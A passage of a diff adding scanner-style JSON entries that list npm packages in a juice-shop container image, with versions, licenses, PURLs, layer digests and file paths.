"ID": "busboy@1.6.0", + "Name": "busboy", + "Identifier": { + "PURL": "pkg:npm/busboy@1.6.0", + "UID": "492d334ad01bb48c" + }, + "Version": "1.6.0", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/busboy/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "bytes@3.1.2", + "Name": "bytes", + "Identifier": { + "PURL": "pkg:npm/bytes@3.1.2", + "UID": "7f081fae9fde13a" + }, + "Version": "3.1.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/bytes/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "cacache@15.3.0", + "Name": "cacache", + "Identifier": { + "PURL": "pkg:npm/cacache@15.3.0", + "UID": "c01ebbafb51bee02" + }, + "Version": "15.3.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/cacache/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "cacache@19.0.1", + "Name": "cacache", + "Identifier": { + "PURL": "pkg:npm/cacache@19.0.1", + "UID": "384917a15800846b" + }, + "Version": "19.0.1", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/cacache/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "cacheable-request@2.1.4", + "Name": "cacheable-request", + "Identifier": { + "PURL": "pkg:npm/cacheable-request@2.1.4", + "UID": "2956c7b8d245b5a3" + }, + "Version": "2.1.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/cacheable-request/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "call-bind@1.0.9", + "Name": "call-bind", + "Identifier": { + "PURL": "pkg:npm/call-bind@1.0.9", + "UID": "511de9c200ecf29a" + }, + "Version": "1.0.9", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/call-bind/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "call-bind-apply-helpers@1.0.2", + "Name": "call-bind-apply-helpers", + "Identifier": { + "PURL": "pkg:npm/call-bind-apply-helpers@1.0.2", + "UID": "7b3da3e7cc3f04c0" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/call-bind-apply-helpers/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "call-bound@1.0.4", + "Name": "call-bound", + "Identifier": { + "PURL": "pkg:npm/call-bound@1.0.4", + "UID": "242eec6b943046b4" + }, + "Version": "1.0.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/call-bound/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "camelcase@5.3.1", + "Name": "camelcase", + "Identifier": { + "PURL": "pkg:npm/camelcase@5.3.1", + "UID": "e2713cf88e195ac5" + }, + "Version": "5.3.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/camelcase/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "chainsaw@0.1.0", + "Name": "chainsaw", + "Identifier": { + "PURL": "pkg:npm/chainsaw@0.1.0", + "UID": "23fecb358dd20188" + }, + "Version": "0.1.0", + "Licenses": [ + "MIT/X11" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/chainsaw/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "chalk@1.1.3", + "Name": "chalk", + "Identifier": { + "PURL": "pkg:npm/chalk@1.1.3", + "UID": "7a66bcbacfe5ad0e" + }, + "Version": "1.1.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/grunt-contrib-compress/node_modules/chalk/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "chalk@2.4.2", + "Name": "chalk", + "Identifier": { + "PURL": "pkg:npm/chalk@2.4.2", + "UID": "2fd65cd5b7ecf053" + }, + "Version": "2.4.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/chalk/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "chalk@4.1.2", + "Name": "chalk", + "Identifier": { + "PURL": "pkg:npm/chalk@4.1.2", + "UID": "9376371453bb8e2c" + }, + "Version": "4.1.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/grunt-legacy-log-utils/node_modules/chalk/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "character-parser@2.2.0", + "Name": "character-parser", + "Identifier": { + "PURL": "pkg:npm/character-parser@2.2.0", + "UID": "552e65ba45eff049" + }, + "Version": "2.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/character-parser/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "check-dependencies@2.0.0", + "Name": "check-dependencies", + "Identifier": { + "PURL": "pkg:npm/check-dependencies@2.0.0", + "UID": "45291077ef059250" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/check-dependencies/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "check-types@6.0.0", + "Name": "check-types", + "Identifier": { + "PURL": "pkg:npm/check-types@6.0.0", + "UID": "4387a7c9bbffdab8" + }, + "Version": "6.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/check-types/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "chownr@1.1.4", + "Name": "chownr", + "Identifier": { + "PURL": "pkg:npm/chownr@1.1.4", + "UID": "f160f593295d16b1" + }, + "Version": "1.1.4", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/node-pre-gyp/node_modules/chownr/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "chownr@1.1.4", + "Name": "chownr", + "Identifier": { + "PURL": "pkg:npm/chownr@1.1.4", + "UID": "ecc6cfb0f783e7f6" + }, + "Version": "1.1.4", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/tar-fs/node_modules/chownr/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "chownr@2.0.0", + "Name": "chownr", + "Identifier": { + "PURL": "pkg:npm/chownr@2.0.0", + "UID": "1819658769f01190" + }, + "Version": "2.0.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/chownr/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "chownr@3.0.0", + "Name": "chownr", + "Identifier": { + "PURL": "pkg:npm/chownr@3.0.0", + "UID": "d6aeb26669254481" + }, + "Version": "3.0.0", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/chownr/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "clarinet@0.12.6", + "Name": "clarinet", + "Identifier": { + "PURL": "pkg:npm/clarinet@0.12.6", + "UID": "cfd5d899969573e8" + }, + "Version": "0.12.6", + "Licenses": [ + "BSD-2-Clause" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/clarinet/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "clean-stack@2.2.0", + "Name": "clean-stack", + "Identifier": { + "PURL": "pkg:npm/clean-stack@2.2.0", + "UID": "7a2cded023eea4c0" + }, + "Version": "2.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/clean-stack/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "cliui@6.0.0", + "Name": "cliui", + "Identifier": { + "PURL": "pkg:npm/cliui@6.0.0", + "UID": "d98bb7c4d74340fe" + }, + "Version": "6.0.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/replace/node_modules/cliui/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "clone@2.1.2", + "Name": "clone", + "Identifier": { + "PURL": "pkg:npm/clone@2.1.2", + "UID": "35c356ffffae0ac0" + }, + "Version": "2.1.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/clone/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "clone-response@1.0.2", + "Name": "clone-response", + "Identifier": { + "PURL": "pkg:npm/clone-response@1.0.2", + "UID": "371201a1af6f91cf" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/clone-response/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "code-point-at@1.1.0", + "Name": "code-point-at", + "Identifier": { + "PURL": "pkg:npm/code-point-at@1.1.0", + "UID": "7697b8873af547c6" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/code-point-at/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "color@5.0.3", + "Name": "color", + "Identifier": { + "PURL": "pkg:npm/color@5.0.3", + "UID": "1cb5aa779e4a578d" + }, + "Version": "5.0.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/color/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "color-convert@1.9.3", + "Name": "color-convert", + "Identifier": { + "PURL": "pkg:npm/color-convert@1.9.3", + "UID": "583f7d4c05f6d347" + }, + "Version": "1.9.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/color-convert/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "color-convert@2.0.1", + "Name": "color-convert", + "Identifier": { + "PURL": "pkg:npm/color-convert@2.0.1", + "UID": "a7bf0b23dea20745" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/grunt-legacy-log-utils/node_modules/color-convert/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "color-convert@2.0.1", + "Name": "color-convert", + "Identifier": { + "PURL": "pkg:npm/color-convert@2.0.1", + "UID": "59df30a78ea11de7" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/replace/node_modules/color-convert/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "color-convert@2.0.1", + "Name": "color-convert", + "Identifier": { + "PURL": "pkg:npm/color-convert@2.0.1", + "UID": "458a3087b522a815" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/wrap-ansi-cjs/node_modules/color-convert/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "color-convert@3.1.3", + "Name": "color-convert", + "Identifier": { + "PURL": "pkg:npm/color-convert@3.1.3", + "UID": "f530b6a89aa2f13a" + }, + "Version": "3.1.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/color/node_modules/color-convert/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "color-name@1.1.3", + "Name": "color-name", + "Identifier": { + "PURL": "pkg:npm/color-name@1.1.3", + "UID": "e6598f1eeb96a05" + }, + "Version": "1.1.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/color-name/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "color-name@1.1.4", + "Name": "color-name", + "Identifier": { + "PURL": "pkg:npm/color-name@1.1.4", + "UID": "27290a871cad486b" + }, + "Version": "1.1.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/grunt-legacy-log-utils/node_modules/color-name/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "color-name@1.1.4", + "Name": "color-name", + "Identifier": { + "PURL": "pkg:npm/color-name@1.1.4", + "UID": "901040abf207bbf7" + }, + "Version": "1.1.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/replace/node_modules/color-name/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "color-name@1.1.4", + "Name": "color-name", + "Identifier": { + "PURL": "pkg:npm/color-name@1.1.4", + "UID": "cf710d80bf986828" + }, + "Version": "1.1.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/wrap-ansi-cjs/node_modules/color-name/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "color-name@2.1.0", + "Name": "color-name", + "Identifier": { + "PURL": "pkg:npm/color-name@2.1.0", + "UID": "47663995b09d054b" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/color-string/node_modules/color-name/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "color-name@2.1.0", + "Name": "color-name", + "Identifier": { + "PURL": "pkg:npm/color-name@2.1.0", + "UID": "38d4a779c22709d8" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/color/node_modules/color-name/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "color-string@2.1.4", + "Name": "color-string", + "Identifier": { + "PURL": "pkg:npm/color-string@2.1.4", + "UID": "ff523df150786079" + }, + "Version": "2.1.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/color-string/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "color-support@1.1.3", + "Name": "color-support", + "Identifier": { + "PURL": "pkg:npm/color-support@1.1.3", + "UID": "ea617fd3146cff66" + }, + "Version": "1.1.3", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/color-support/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "colors@1.1.2", + "Name": "colors", + "Identifier": { + "PURL": "pkg:npm/colors@1.1.2", + "UID": "3a11f326d21a400d" + }, + "Version": "1.1.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/grunt-legacy-log/node_modules/colors/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "colors@1.4.0", + "Name": "colors", + "Identifier": { + "PURL": "pkg:npm/colors@1.4.0", + "UID": "b72a1048cfb1a945" + }, + "Version": "1.4.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/colors/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "commander@2.20.3", + "Name": "commander", + "Identifier": { + "PURL": "pkg:npm/commander@2.20.3", + "UID": "595f872eb8cc4a70" + }, + "Version": "2.20.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/seek-bzip/node_modules/commander/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "commander@2.20.3", + "Name": "commander", + "Identifier": { + "PURL": "pkg:npm/commander@2.20.3", + "UID": "1d084dfae5702fd4" + }, + "Version": "2.20.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/yaml-schema-validator/node_modules/commander/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "component-emitter@1.3.1", + "Name": "component-emitter", + "Identifier": { + "PURL": "pkg:npm/component-emitter@1.3.1", + "UID": "f51bee1276368a4b" + }, + "Version": "1.3.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/component-emitter/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "component-type@1.2.1", + "Name": "component-type", + "Identifier": { + "PURL": "pkg:npm/component-type@1.2.1", + "UID": "966b8a5a09ceed36" + }, + "Version": "1.2.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/component-type/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "compress-commons@1.2.2", + "Name": "compress-commons", + "Identifier": { + "PURL": "pkg:npm/compress-commons@1.2.2", + "UID": "e42aea212c3741ea" + }, + "Version": "1.2.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/compress-commons/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "compressible@2.0.18", + "Name": "compressible", + "Identifier": { + "PURL": "pkg:npm/compressible@2.0.18", + "UID": "1c93e8ce1c01dee6" + }, + "Version": "2.0.18", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/compressible/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "compression@1.8.1", + "Name": "compression", + "Identifier": { + "PURL": "pkg:npm/compression@1.8.1", + "UID": "67cd5ab39a6024db" + }, + "Version": "1.8.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/compression/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "concat-map@0.0.1", + "Name": "concat-map", + "Identifier": { + "PURL": "pkg:npm/concat-map@0.0.1", + "UID": "1cdc711af7a296ce" + }, + "Version": "0.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/concat-map/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "concat-stream@1.6.2", + "Name": "concat-stream", + "Identifier": { + "PURL": "pkg:npm/concat-stream@1.6.2", + "UID": "f6c03292f9e7b981" + }, + "Version": "1.6.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": 